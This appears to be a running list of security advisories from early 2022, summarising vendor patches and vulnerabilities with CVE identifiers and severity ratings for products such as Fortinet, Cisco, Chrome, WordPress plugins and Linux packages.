CVE ID: CVE-2021-43299 (High), CVE-2021-43300 (High), CVE-2021-43301 (High),
CVE-2021-43302 (Medium), CVE-2021-43303 (Medium)
Multiple vulnerabilities have been discovered in several Fortinet products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
CVE ID: CVE-2022-22301 (High), CVE-2022-22300 (Low), CVE-2021-36166 (Critical),
CVE-2022-22303 (Low), CVE-2020-15936 (Low), CVE-2021-36171 (High), CVE-2021-44166 (Low),
CVE-2021-43070 (Medium), CVE-2021-43077 (High), CVE-2021-43075 (High)
SUSE has released security updates to resolve multiple vulnerabilities in php72.
CVE ID: CVE-2015-9253 (Medium), CVE-2017-8923 (Critical), CVE-2021-21707 (Medium)
Cisco has released security updates to resolve a Denial of Service (DoS) vulnerability in the
DNS-based Authentication of Named Entities (DANE) email verification component of Cisco
AsyncOS Software for Cisco Email Security Appliance (ESA).
CVE ID: CVE-2022-20653 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Red Hat has released a security update to resolve path traversal and dereference of symlinks
vulnerabilities in OpenShift GitOps 1.3 on OCP 4.7-4.9.
CVE ID: CVE-2022-24348 (High)
It has been discovered that all versions of GE's Proficy CIMPLICITY equipment are vulnerable
due to cleartext transmission of sensitive information. Successful exploitation can allow an
attacker to capture a connection session, resulting in disclosure of sensitive information.
CVE ID: CVE-2022-21798 (High)
It has been discovered that Visual Voice Mail (VVM) services transmit unencrypted
credentials via SMS. An attacker with the ability to read SMS messages can obtain VVM IMAP
credentials and gain access to VVM data.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
ASUSTOR NAS (Network-Attached Storage) has released security updates to resolve several
security issues in its products. ASUSTOR NAS has also released a guideline to mitigate
ransomware and malware risks.
Juniper Networks has released a security update to resolve stack-based buffer overflow and
improper locking vulnerabilities in the MX series and SRX series of Junos OS.
CVE ID: CVE-2022-22175 (High), CVE-2022-22178 (High)
Multiple vulnerabilities have been discovered in FATEK Automation's FvDesigner equipment.
Successful exploitation can cause arbitrary code execution.
CVE ID: CVE-2022-25170 (High), CVE-2022-23985 (High), CVE-2022-21209 (High)
Bently Nevada has released a security update to resolve a use of password hash with
insufficient computational effort vulnerability in Bently Nevada's 3500 equipment.
CVE ID: CVE-2021-32997 (High)
VMware has released a security update to resolve a stored Cross-Site Scripting (XSS)
vulnerability affecting its Workspace ONE Boxer product.
CVE ID: CVE-2022-22944 (Medium)
Trend Micro has released critical patches to resolve vulnerabilities related to a static
credential, integer overflow and Denial of Service (DoS) for Trend Micro ServerProtect.
CVE ID: CVE-2022-25329 (Critical), CVE-2022-25330 (High), CVE-2022-25331 (Medium)
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20623 (High), CVE-2022-20650 (High), CVE-2022-20624 (High),
CVE-2021-1586 (High), CVE-2022-20625 (Medium)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
A Remote Code Execution (RCE) vulnerability has been discovered in the Oracle Talent
Acquisition Cloud - Taleo Enterprise Edition which can cause a partial Denial of Service
(partial DoS).
CVE ID: CVE-2021-35689 (Critical)
GE has released a security update to resolve an improper privilege management vulnerability in
Proficy CIMPLICITY equipment.
CVE ID: CVE-2022-23921 (High)
It has been discovered that the backend infrastructure shared by multiple mobile device
monitoring services does not adequately authenticate or authorize API requests, creating an
IDOR (Insecure Direct Object Reference) vulnerability. These services and their associated
apps can be used to perform non-consensual, unauthorized monitoring and are commonly called
"stalkerware."
Android has released a security bulletin to address multiple vulnerabilities affecting several
Android devices. Android 12L devices with security patch levels of 2022-03-01 or later are
protected against these issues.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in Expat, an XML parsing C library, which can
result in denial of service or potentially the execution of arbitrary code, if a malformed
XML file is processed. It is recommended to upgrade the expat packages.
CVE ID: CVE-2022-25235, CVE-2022-25236, CVE-2022-25313, CVE-2022-25314,
CVE-2022-25315
Multiple vulnerabilities have been discovered in Insyde BIOS that affect Siemens products.
An attacker can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-24030 (Critical), CVE-2021-45971 (Critical), CVE-2021-45970
(Critical), CVE-2021-45969 (Critical), CVE-2021-42554 (Critical)
Insyde has released a security update to address multiple vulnerabilities in InsydeH2O
products.
CVE ID: CVE-2021-43613 (Medium), CVE-2021-43614 (Medium), CVE-2021-38489 (High)
Dell has released a security update for Dell EMC Integrated Data Protection Appliance
(PowerProtect DP Series) to resolve multiple vulnerabilities that can be exploited by malicious
users to compromise the affected system.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Debian has released a security update to resolve multiple vulnerabilities in webkit2gtk and
wpewebkit.
CVE ID: CVE-2022-22589, CVE-2022-22590, CVE-2022-22592, CVE-2022-22620
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
WordPress has released version 5.0.9 to resolve a Cross-Site Scripting (XSS) vulnerability
due to insufficient escaping and sanitization of the settings parameter in the Essential Addons
for Elementor Lite WordPress plugin. The affected versions are Essential Addons for
Elementor Lite versions up to and including 5.0.8.
CVE ID: CVE-2022-0683 (Medium)
Cisco has released security updates to address a vulnerability in Cisco IOS XR software which
allows an authenticated, remote attacker to overwrite and read arbitrary files on the local
device.
CVE ID: CVE-2021-34718 (High)
Juniper Networks has released a security update to resolve an allocation of resources without
limits or throttling vulnerability in all versions of Junos OS used in the MX Series with SPC3
and the SRX Series.
CVE ID: CVE-2022-22153 (High)
Multiple vulnerabilities such as Cross-Site Scripting (XSS), template injection and
authentication bypass have been discovered in a-blog cms. It is recommended to update the
a-blog cms software to the latest version.
CVE ID: CVE-2022-24374 (Medium), CVE-2022-23916 (Medium), CVE-2022-23810 (Medium),
CVE-2022-21142 (Medium)
Cisco has released security updates to address a command injection vulnerability in the CLI
of Cisco IOS XE SD-WAN software which allows an authenticated, local attacker to execute
arbitrary commands with root privileges.
CVE ID: CVE-2021-1529 (High)
A Cross-Site Scripting (XSS) vulnerability due to insufficient escaping and sanitization of the
IP, platform and current_page_id parameters has been discovered in the WP
Statistics WordPress plugin. The affected versions are WP Statistics versions up to and
including 13.1.5. The updated version 13.1.6 is available.
CVE ID: CVE-2022-25305 (High), CVE-2022-25306 (High), CVE-2022-25307 (High)
Google Chrome has released Stable channel updated version 98.0.4758.107 (Platform version:
14388.61.0) for most Chrome OS devices, Dev channel 100.0.4892.0 for Windows, Linux and Mac,
and Beta 99 (99.0.4844.36) for iOS to resolve multiple vulnerabilities.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Moxa has released security updates to resolve a vulnerability which can enable a
Man-in-the-Middle (MITM) attack against Moxa's MGate MB3170/MB3270/MB3280/MB3480 Series Protocol
Gateways.
Debian has released a security update to address a code execution vulnerability in the zsh package,
a powerful shell and scripting language.
CVE ID: CVE-2021-45444
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20653 (High), CVE-2022-20750 (Medium), CVE-2022-20659 (Medium)
Drupal has released a security update to address information disclosure and improper input
validation vulnerabilities in the Quick Edit module and Drupal core's form API respectively.
CVE ID: CVE-2022-25270, CVE-2022-25271
Google Chrome has released updated version Beta 99 (99.0.4844.35) for Android, Beta channel
99.0.4844.33 (Platform version: 14469.24.0) for most Chrome OS devices, Beta channel for
Desktop 99.0.4844.35 for Mac, Windows and Linux and LTC-96 to 96.0.4664.194 (Platform
Version: 14268.73.0) for most ChromeOS devices to resolve multiple vulnerabilities.
CVE ID: CVE-2022-0099 (High), CVE-2022-0308 (Medium), CVE-2022-0453 (High),
CVE-2022-0456 (High), CVE-2022-0460 (Medium), CVE-2022-0465 (Medium), CVE-2022-0603 (High),
CVE-2022-0608 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
A SQL injection vulnerability due to insufficient escaping and parameterization has been
discovered in the WP Statistics WordPress plugin. The affected versions are WP Statistics
versions up to and including 13.1.5. The updated version 13.1.6 is available.
CVE ID: CVE-2022-0651 (Critical), CVE-2022-25149 (Critical), CVE-2022-25148
(Critical)
Trend Micro has released an update to address a Privilege Escalation vulnerability in Trend
Micro Antivirus for Mac. The update resolves a vulnerability in the product that allows a
local attacker to modify a file during the update process and escalate their privileges.
CVE ID: CVE-2022-24671
Oracle Solaris has released a security update to address multiple vulnerabilities in third
party software that is included in Oracle Solaris distributions.
Trend Micro has released new security patches to resolve Denial of Service (DoS) and local
privilege escalation vulnerabilities in Apex One for the Windows platform.
CVE ID: CVE-2022-24678 (Medium), CVE-2022-24679 (High), CVE-2022-24680 (High)
Huawei has released a security update to address a privilege escalation vulnerability in Huawei
PCManager. Successful exploitation can allow an attacker to access certain resources beyond
its privileges.
CVE ID: CVE-2021-40046 (High)
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Mitsubishi Electric has released a security update to resolve Cross Site Scripting (XSS)
vulnerabilities in its Energy Saving Data Collecting Server (EcoWebServerIII).
CVE ID: CVE-2016-10735 (Medium), CVE-2017-18214 (High), CVE-2018-14040 (Medium),
CVE-2018-14042 (Medium), CVE-2018-20676 (Medium), CVE-2019-8331 (Medium), CVE-2020-7746
(High), CVE-2020-11022 (Medium), CVE-2020-11023 (Medium)
Apache has released security updates to resolve multiple vulnerabilities in its products.
CVE ID: CVE-2021-44521 (High), CVE-2022-22931 (Medium), CVE-2022-23206 (High),
CVE-2022-24112
Google Chrome has released version Chrome 98 (98.0.4758.101) for Android, Chrome 98
(98.0.4758.97) for iOS and Stable channel 98.0.4758.102 for Windows, Mac and Linux to
resolve multiple vulnerabilities.
CVE ID: CVE-2022-0603 (High), CVE-2022-0604 (High), CVE-2022-0605 (High),
CVE-2022-0606 (High), CVE-2022-0607 (High), CVE-2022-0608 (High), CVE-2022-0609 (High),
CVE-2022-0610 (Medium)
Dell has released a security update to resolve a credential disclosure vulnerability in EMC
Enterprise Storage Analytics for vRealize Operations.
CVE ID: CVE-2021-43590 (Medium)
NVIDIA has released a security update to resolve a privilege escalation vulnerability in the
Delegated License Service (DLS) virtual appliance component of NVIDIA License System.
CVE ID: CVE-2022-21818 (Medium)
Debian has released a security update to resolve multiple vulnerabilities in the Minetest package.
Successful exploitation can cause Lua code injection or a Denial of Service (DoS) attack
against a Minetest server.
CVE ID: CVE-2022-24300 (Critical), CVE-2022-24301 (Medium)
Adobe has released a security update to address an improper input validation vulnerability
which can cause arbitrary code execution in Adobe Commerce and Magento Open Source. The
affected versions are 2.4.3-p1 and earlier, and 2.3.7-p2 and earlier, on all
platforms.
CVE ID: CVE-2022-24086 (Critical)
Debian has released a security update to resolve multiple vulnerabilities in Expat, an XML
parsing C library. Successful exploitation can cause execution of arbitrary code or a Denial
of Service (DoS) attack if a malformed XML file is processed.
CVE ID: CVE-2021-45960 (High), CVE-2021-46143 (High), CVE-2022-22822 (Critical),
CVE-2022-22823 (Critical), CVE-2022-22824 (Critical), CVE-2022-22825 (High), CVE-2022-22826
(High), CVE-2022-22827 (High), CVE-2022-23852 (Critical), CVE-2022-23990 (Critical)
WordPress has released a security update to address multiple vulnerabilities in WordPress
versions prior to 5.9.2. Successful exploitation can allow a remote attacker to take control
of an affected website.
A SQL injection vulnerability due to insufficient escaping and parameterization has been
discovered in the WP Statistics WordPress plugin. The affected versions are WP Statistics
versions up to and including 13.1.4. The updated version 13.1.5 is available.
CVE ID: CVE-2022-0513 (Critical)
Google Chrome Dev channel has been updated to 100.0.4878.0 for Windows, Linux and Mac, and
Beta channel has been updated to 99.0.4844.23 (Platform version: 14469.16.0) for most Chrome
OS devices.
Wireshark has released security updates to address multiple vulnerabilities in several
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
It has been discovered that Ifme versions 1.0.0 to 7.33.2 do not properly invalidate a
user's session even after the user initiates logout. Successful exploitation can cause reuse
of admin cookies either via local/network access or by other hypothetical attacks. The
update is available.
CVE ID: CVE-2021-25992 (Critical)
A persistent Cross-Site Scripting (XSS) vulnerability has been discovered in two input
fields within the administrative panel when editing users in the XMPie UStore application on
version 12.3.7244.0.
CVE ID: CVE-2022-23321
Moxa has released security updates to address cleartext transmission of sensitive
information and hard-coded credentials vulnerabilities in MXview Series Network Management
Software and EDR-G903, EDR-G902 and EDR-810 series secure routers.
CVE ID: CVE-2021-40390, CVE-2021-40392
Multiple vulnerabilities have been discovered in Samba that affect QNAP NAS. Successful
exploitation may allow an attacker to access sensitive information, run arbitrary commands and
impersonate existing services.
CVE ID: CVE-2022-0336, CVE-2021-44141, CVE-2021-44142
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Cisco has released updated fixed software to resolve multiple critical vulnerabilities in
Cisco Small Business RV160, RV260, RV340, and RV345 series routers.
Multiple vulnerabilities have been discovered in various Palo Alto Networks products. An
attacker can exploit these vulnerabilities to take control of an affected system. The
updates are available.
CVE ID: CVE-2022-0016 (High), CVE-2022-0017 (High), CVE-2022-0020 (Medium),
CVE-2022-0011 (Medium), CVE-2022-0018 (Medium), CVE-2022-0019 (Medium), CVE-2022-0021 (Low)
Microsoft has released security updates to address multiple vulnerabilities in its products.
A remote attacker can exploit these vulnerabilities to take control of an affected system.
Jenkins has released a security update to resolve a vulnerability in the XStream library
that can cause Denial of Service (DoS). The affected versions are Jenkins weekly up to and
including 2.333 and Jenkins LTS up to and including 2.319.2.
CVE ID: CVE-2022-0538, CVE-2021-43859
Drupal has released a security update to address Cross Site Scripting (XSS) and access
bypass vulnerabilities in the Custom Breadcrumbs module and the Fancy File Delete module,
respectively.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Microsoft has released a security update to resolve an Elevation of Privilege Vulnerability
(EPV) in Print Spooler software affecting multiple Windows products.
CVE ID: CVE-2022-22718 (High)
Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR.
An attacker can exploit these vulnerabilities to take control of an affected system.
WordPress has released a security update to resolve a SQL injection vulnerability discovered
in the Fancy Product Designer WordPress plugin. This vulnerability allows attackers with
administrative level permissions to inject arbitrary SQL queries to obtain sensitive
information. The affected versions are Fancy Product Designer versions up to and including
4.7.4.
CVE ID: CVE-2021-4134 (High)
Intel has released security updates to address multiple vulnerabilities in several Intel
products. A remote attacker can exploit these vulnerabilities to take control of an affected
system.
IBM has released security updates to address multiple vulnerabilities in several IBM
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
Multiple vulnerabilities have been discovered in Zoom affecting several platforms. An
attacker can exploit these vulnerabilities to take control of an affected system. The
updates are available.
CVE ID: CVE-2022-22780 (Medium), CVE-2022-22779 (Low)
Multiple vulnerabilities have been discovered in Mitsubishi Electric's FA Engineering
Software Products. Mitsubishi Electric has released security updates to resolve these
vulnerabilities.
CVE ID: CVE-2021-20587 (High), CVE-2021-20588 (High), CVE-2020-14521
SonicWall has released a workaround and an update to resolve an insufficient check of null
pointer vulnerability in SonicWall SMA1000 SNMP. Successful exploitation of the
vulnerability can cause Denial of Service (DoS). The affected products are SonicWall SMA1000
12.4.1-02779 and earlier.
Multiple vulnerabilities have been discovered in Chromium, which can result in the execution
of arbitrary code, Denial of Service (DoS) or information disclosure. It is recommended to
upgrade the chromium packages.
CVE ID: CVE-2022-0452, CVE-2022-0453, CVE-2022-0454, CVE-2022-0455, CVE-2022-0456,
CVE-2022-0457, CVE-2022-0458, CVE-2022-0459, CVE-2022-0460, CVE-2022-0461, CVE-2022-0462,
CVE-2022-0463, CVE-2022-0464, CVE-2022-0465, CVE-2022-0466, CVE-2022-0467, CVE-2022-0468,
CVE-2022-0469, CVE-2022-0470
A directory traversal vulnerability has been discovered in Argo CD, an open-source Continuous
Delivery (CD) platform, which enables attackers to access sensitive information such as
passwords and API keys. The affected products are Argo CD before 2.1.9 and 2.2.x before
2.2.4. The updates are available.
CVE ID: CVE-2022-24348
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system. The updates are available.
CVE ID: CVE-2019-20444 (Critical), CVE-2019-20445 (Critical), CVE-2022-23307
(Critical), CVE-2022-23990 (Critical), CVE-2020-25638 (High), CVE-2021-22696 (High),
CVE-2021-4160 (Medium), CVE-2019-16869 (High), CVE-2020-7238 (High)
A Cross-Site Scripting (XSS) vulnerability has been discovered in Plus one product CSV+. The
affected products are CSV+ prior to 0.8.1.
CVE ID: CVE-2022-21241 (High)
Multiple vulnerabilities have been resolved in GitLab updated versions 14.7.1, 14.6.4, and
14.5.4 for GitLab Community Edition (CE) and Enterprise Edition (EE).
Debian has released a security update to resolve multiple vulnerabilities in Ruby.
CVE ID: CVE-2021-28965, CVE-2021-31799, CVE-2021-31810, CVE-2021-41817,
CVE-2021-41819, CVE-2021-32066, CVE-2021-41816
Multiple vulnerabilities, such as an integer coercion error and an out-of-bounds write, have
been discovered in FANUC's R-30iA and R-30iB series controllers. These can cause a buffer
overflow condition, Remote Code Execution (RCE), and a crash of the device being accessed.
CVE ID: CVE-2021-32996 (High), CVE-2021-32998 (High)
Dell PowerEdge has released a security update to resolve an information disclosure
vulnerability in Intel Solid State Drive (SSD) Data Center (DC) products.
CVE ID: CVE-2021-0148 (High)
NETGEAR has released security updates to resolve pre-authentication command injection and
stack overflow vulnerabilities in several products. NETGEAR will not release fixes for the
vulnerabilities on EX6100v1 as it is outside of the security support period.
Johnson Controls has released a security update to address the Log4j Remote Code Execution
(RCE) vulnerability in PowerManage versions 4.0 to 4.8.
CVE ID: CVE-2021-44228 (Critical)
Google has released Chrome Beta channel update 99.0.4844.14 and Long Term Support (LTS)
channel update 96.0.4664.180 to resolve critical vulnerabilities for most ChromeOS devices.
Google has also released Chrome Beta 99 (99.0.4844.16) for Android, Chrome 99 Beta channel
update 99.0.4844.17 for Windows and Linux and 99.0.4844.15 for Mac, and Chrome Beta 99
(99.0.4844.18) for iOS to resolve multiple vulnerabilities.
CVE ID: CVE-2022-0096 (Critical), CVE-2022-0289 (Critical)
Cisco has released security updates to address several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
NVIDIA has released a software security update to address multiple vulnerabilities in GPU
Display Driver that can cause Denial of Service (DoS) or memory corruption.
CVE ID: CVE-2022-21813 (Medium), CVE-2022-21814 (Medium), CVE-2022-21815 (Medium),
CVE-2022-21816 (Medium)
Cisco has released a security update to resolve multiple critical vulnerabilities in Cisco
Small Business RV160, RV260, RV340, and RV345 series routers. Successful exploitation can
allow an attacker to execute arbitrary code or commands, elevate privileges, bypass
authentication and authorization protections, fetch and run unsigned software, and cause
Denial of Service (DoS).
CVE ID: CVE-2022-20699 (Critical), CVE-2022-20700 (Critical), CVE-2022-20701
(Critical), CVE-2022-20702 (Medium), CVE-2022-20703 (Critical), CVE-2022-20704 (Medium),
CVE-2022-20705 (High), CVE-2022-20706 (High), CVE-2022-20708 (Critical), CVE-2022-20707
(High), CVE-2022-20749 (High), CVE-2022-20709 (Medium), CVE-2022-20710 (Medium),
CVE-2022-20711 (High), CVE-2022-20712 (High)
Google has released Chrome versions 98.0.4758.80/81/82 for Windows and 98.0.4758.80 for Mac
and Linux, Beta channel 98.0.4758.79 (Platform version: 14388.44.0) for most Chrome OS
devices, Chrome 98 (98.0.4758.87) for Android, Chrome 98 (98.0.4758.85) for iOS, and Dev
channel 99.0.4844.16 for Windows, Linux and 99.0.4844.15 for Mac to address multiple
vulnerabilities.
It has been discovered that InsydeH2O Hardware-2-Operating System (H2O) UEFI firmware
contains multiple vulnerabilities related to memory management in System Management Mode
(SMM). The firmware update is available.
Multiple vulnerabilities have been discovered in multiple open-source and proprietary Object
Management Group (OMG) Data-Distribution Service (DDS) implementations. Successful
exploitation can result in Denial-of-Service (DoS) or buffer-overflow conditions, Remote
Code Execution (RCE) or information exposure. The affected products are CycloneDDS, FastDDS,
GurumDDS, OpenDDS, Connext DDS Professional, Connext DDS Secure, Connext DDS Micro, CoreDX
DDS.
Multiple vulnerabilities have been discovered in several Fortinet products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-36177 (Medium), CVE-2021-41016 (High), CVE-2021-43062 (Medium),
CVE-2021-43073 (High), CVE-2021-41018 (High), CVE-2021-36193 (Medium), CVE-2021-42753 (High)
An authenticated OS command injection vulnerability has been discovered in Ricon Mobile's
Industrial Cellular router, which can allow an attacker to inject and execute arbitrary shell
commands as an Admin user.
CVE ID: CVE-2022-0365 (Critical)
It has been discovered that Advantech's ADAM-3600 uses a hard-coded cryptographic key inside
the project folder, which may allow an attacker to log in to the web server and gain
unauthorized access to intercept traffic.
CVE ID: CVE-2022-22987 (Critical)
A critical Remote Code Execution (RCE) vulnerability has been resolved in Essential Addons
for Elementor, a popular WordPress plugin. The affected versions are Essential Addons for
Elementor version 5.0.4 and older.
My Cloud OS 5 has released Firmware 5.19.117 to improve the security of My Cloud OS 5
devices.
CVE ID: CVE-2020-25717, CVE-2020-21913, CVE-2022-22991, CVE-2022-22994,
CVE-2022-22989, CVE-2022-22990, CVE-2022-22992, CVE-2022-22993
A Cross-Origin Resource Sharing (CORS) vulnerability has been discovered in NVIDIA Omniverse
Launcher. Successful exploitation can lead to code execution, escalation of privileges and
impact to confidentiality and integrity. NVIDIA has released a software update to address
the issue.
CVE ID: CVE-2022-21817 (Critical)
A reflected Cross-Site Scripting (XSS) vulnerability has been discovered in the Fotobook
WordPress plugin versions up to and including 3.2.3.
CVE ID: CVE-2022-03801 (Medium)
VMware has released a security update to resolve an information disclosure vulnerability in
VMware Cloud Foundation SDDC Manager.
CVE ID: CVE-2022-22939 (Medium)
It has been discovered that the Samba vfs_fruit module allows an out-of-bounds heap read and
write via extended file attributes. This vulnerability allows a remote attacker to execute
arbitrary code with root privileges.
CVE ID: CVE-2021-44142
Multiple critical vulnerabilities have been discovered in NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-22822 (Critical), CVE-2022-22823 (Critical), CVE-2022-22824
(Critical), CVE-2022-23218 (Critical), CVE-2022-23219 (Critical), CVE-2021-22060 (Medium),
CVE-2021-41817 (High), CVE-2022-22846 (Medium), CVE-2022-22825 (High), CVE-2022-22826
(High), CVE-2022-22827 (High), CVE-2021-45485 (High)
IBM has released a security update to fix an Apache Log4j vulnerability in IBM Spectrum
Scale. The affected products are IBM Spectrum Scale versions 5.0.0 - 5.0.5.11 (all HDFS
Transparency versions) and 5.1.0 - 5.1.1 (HDFS Transparency version 2.7.3 - 3.1.0).
CVE ID: CVE-2021-4104 (High)
An information disclosure vulnerability has been discovered in AMD Platform Security
Processor (PSP) chipset driver affecting multiple Dell products. This vulnerability allows
low privileged malicious users to access and leak data through the AMD Chipset Driver. The
updates are available.
CVE ID: CVE-2021-26333 (Medium)
A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in Symfony due to a
recent change in configuration loading. The affected Symfony versions are 5.3.14, 5.4.3, and
6.0.3. This issue has been resolved in versions 5.3.15, 5.4.4, and 6.0.4.
Oracle Solaris has released a security update to address multiple vulnerabilities in third
party software that is included in Oracle Solaris distributions.
Google has released security update for Chrome Beta 99 (99.0.4844.7) for iOS, Stable channel
97.0.4692.102 for most Chrome OS devices and Dev channel 99.0.4844.11 for Windows, Mac and
Linux.
A carry propagation bug has been discovered in the MIPS32 and MIPS64 squaring procedure. The
affected OpenSSL versions are 1.0.2, 1.1.1 and 3.0.0. The updates are available.
CVE ID: CVE-2021-4160
Multiple vulnerabilities have been discovered in Fresenius Kabi's Agilia Connect Infusion
System. Successful exploitation of these vulnerabilities can allow an attacker to gain access
to sensitive information, modify settings or parameters, or perform arbitrary actions as an
authenticated user. The updates are available.
Multiple vulnerabilities, such as access bypass and information disclosure, have been
discovered in the Private Taxonomy Terms module for Drupal. This module enables users to
create 'private' vocabularies. The updates are available.
It has been discovered that all network connected Xerox VersaLink business printers and copy
machines are susceptible to a Denial of Service (DoS) attack via a crafted TIFF file in an
unauthenticated HTTP POST request.
CVE ID: CVE-2022-23968
Debian has released security updates to resolve multiple vulnerabilities in uriparser, a
library that parses Uniform Resource Identifiers (URIs).
CVE ID: CVE-2021-46141, CVE-2021-46142
It has been discovered that the Embed Swagger WordPress plugin is vulnerable to reflected
Cross-Site Scripting (XSS) due to insufficient escaping/sanitisation and validation.
CVE ID: CVE-2022-0381 (Medium)
Huawei has released a security update to resolve a laser command injection vulnerability in
AIS-BW80H-00 versions earlier than 9.0.3.4(H100SP13C00).
CVE ID: CVE-2021-40043 (High)
An insufficient check of user-provided input has caused a Cross Site Scripting (XSS)
vulnerability in the Navbar module for Drupal. The updates are available.
Improper restriction of XML external entity reference and path traversal vulnerabilities
have been discovered in GE Gas Power's ToolBoxST. Successful exploitation can result in data
exfiltration or arbitrary file write, overwrite and execution. The affected products are
ToolBoxST OS all versions prior to 07.09.07C.
CVE ID: CVE-2021-44477 (High), CVE-2018-16202 (Medium)
Cross Site Scripting (XSS) and directory traversal vulnerabilities have been discovered in
TransmitMail. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-22146 (Medium), CVE-2022-21193 (Medium)
A privilege escalation vulnerability has been discovered in polkit’s pkexec, a SUID-root
program that is installed by default on every major Linux distribution. Successful
exploitation of this vulnerability allows any unprivileged user to gain full root privileges
on a vulnerable host in its default configuration.
CVE ID: CVE-2021-4034
Trend Micro has released a security update to resolve directory traversal and code injection
vulnerabilities in Deep Security Agent and Cloud One - Workload Security for Linux.
CVE ID: CVE-2022-23119 (High), CVE-2022-23120 (High)
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-41819 (High), CVE-2021-44716 (High), CVE-2021-45485 (High),
CVE-2021-45960 (High), CVE-2021-46143 (High)
Multiple vulnerabilities have been discovered in Moodle. An attacker can exploit these
vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-0335, CVE-2022-0334, CVE-2022-0333, CVE-2022-0332
Multiple vulnerabilities have been discovered in Zimbra, a WebRTC stream aggregator. It is
recommended to use Patch 23 for Zimbra 9.0.0 and Patch 30 for Zimbra 8.8.15.
SolarWinds has released a security update to resolve a Hibernate Query Language (HQL)
injection vulnerability in Web Help Desk software which allows an attacker to execute
Hibernate SQL queries against the database models defined in the source code.
CVE ID: CVE-2021-35232
Multiple vulnerabilities, such as file inclusion and file write, have been discovered in
CentOS Web Panel, also known as Control Web Panel (CWP). Successful exploitation of these
vulnerabilities can lead to Remote Code Execution (RCE).
CVE ID: CVE-2021-45467, CVE-2021-45466
Multiple vulnerabilities have been discovered in various PrinterLogic products. The
affected products are PrinterLogic Web Stack version 19.1.1.13 SP9 and earlier, PrinterLogic
Virtual Appliance version 20.0.1304 and earlier, and PrinterLogic SaaS. The updates are
available.
CVE ID: CVE-2021-42631, CVE-2021-42633, CVE-2021-42635,
CVE-2021-42637, CVE-2021-42638, CVE-2021-42639, CVE-2021-42640, CVE-2021-42641,
CVE-2021-42642
McAfee has released a security update to address a SQL injection vulnerability in the Data
Loss Protection (DLP) ePO extension. Versions prior to 11.8.100, 11.7.101 and 11.6.401 are
affected.
CVE ID: CVE-2021-4088 (High)
Multiple vulnerabilities have been discovered in NetApp products. An attacker can exploit
these vulnerabilities to take control of an affected system.
CVE ID: CVE-2021-41819 (High), CVE-2021-44716 (High), CVE-2021-45485 (High),
CVE-2021-45960 (High), CVE-2021-46143 (High), CVE-2021-45115 (High), CVE-2021-45116 (High),
CVE-2021-45452 (Medium)
Multiple vulnerabilities have been discovered in Philips' Vue PACS. An attacker can exploit
these vulnerabilities to take control of an affected system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The security updates are available.
Multiple vulnerabilities have been discovered in Mitsubishi Electric's GENESIS64, MC
Works64, GOT2000 series, GOT SIMPLE series, SoftGOT2000 and Tension Controller. An attacker
can exploit these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-23128 (Critical), CVE-2022-23130 (Medium), CVE-2022-23129 (High),
CVE-2022-23127 (Medium), CVE-2020-5675 (High)
Zabbix has released a security update to resolve an authentication bypass/instance takeover
vulnerability in the Frontend (F) component. The affected products are Frontend (F) versions
5.4.0 - 5.4.8 and 6.0.0alpha1.
CVE ID: CVE-2022-23131 (Critical)
Citrix has released a security update to resolve a buffer overflow vulnerability in Citrix
Application Delivery Controller (ADC), formerly known as NetScaler ADC, and Citrix Gateway,
formerly known as NetScaler Gateway, platforms.
CVE ID: CVE-2019-0140 (High)
A stored Cross-Site Scripting (XSS) vulnerability has been discovered in Canon laser
printers and small office multifunctional printers. The updates are available.
